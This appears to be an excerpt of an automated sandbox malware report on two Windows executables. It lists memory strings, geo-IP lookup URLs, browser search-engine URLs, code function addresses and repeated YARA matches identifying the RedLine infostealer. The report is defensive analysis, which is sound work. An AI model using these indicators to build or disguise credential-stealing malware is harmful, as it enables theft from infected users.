                    Source: RgIbrhxoEx.exe, LjGABleGAy.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: RgIbrhxoEx.exe, LjGABleGAy.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133067683.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2217562708.0000000003226000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003100000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2337066239.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2337066239.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: RgIbrhxoEx.exe, LjGABleGAy.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    .NET source code contains very large array initializations
                    Source: 0.2.RgIbrhxoEx.exe.5270000.5.raw.unpack, SizeParameters.csLarge array initialization: : array initializer size 15921
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_013208280_2_01320828
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_013208400_2_01320840
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_013228B00_2_013228B0
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_013210B00_2_013210B0
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_013210A00_2_013210A0
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_01329C300_2_01329C30
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_01320C780_2_01320C78
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_01322CE80_2_01322CE8
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_0137DEA40_2_0137DEA4
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_02D870200_2_02D87020
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_02D8F3500_2_02D8F350
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_02D800400_2_02D80040
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_02D870100_2_02D87010
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 0_2_02D800070_2_02D80007
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_013CE7B08_2_013CE7B0
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_013CDC908_2_013CDC90
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_069796288_2_06979628
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_069744688_2_06974468
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_069713008_2_06971300
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_069733208_2_06973320
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_0697D1088_2_0697D108
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_0697DD008_2_0697DD00
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 8_2_069712FB8_2_069712FB
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_013B4B0110_2_013B4B01
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_013BDEA410_2_013BDEA4
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_0305084010_2_03050840
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_030510A010_2_030510A0
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_030510B010_2_030510B0
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_030528B010_2_030528B0
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_030590F010_2_030590F0
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_03050C7810_2_03050C78
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 10_2_03052CE810_2_03052CE8
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 14_2_012DE7B014_2_012DE7B0
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 14_2_012DDC9014_2_012DDC90
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 14_2_065A962814_2_065A9628
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 14_2_065A446814_2_065A4468
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 14_2_065A121014_2_065A1210
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 14_2_065A332014_2_065A3320
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 14_2_065AD10814_2_065AD108
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 14_2_065ADD0014_2_065ADD00
                    Source: RgIbrhxoEx.exeStatic PE information: invalid certificate
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2134740884.0000000005270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2135400131.0000000005F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133731245.0000000003F7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2130972981.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133067683.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133067683.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000000.2039485781.0000000000938000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiLuj.exe8 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2243652387.0000000001438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exeBinary or memory string: OriginalFilenameiLuj.exe8 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
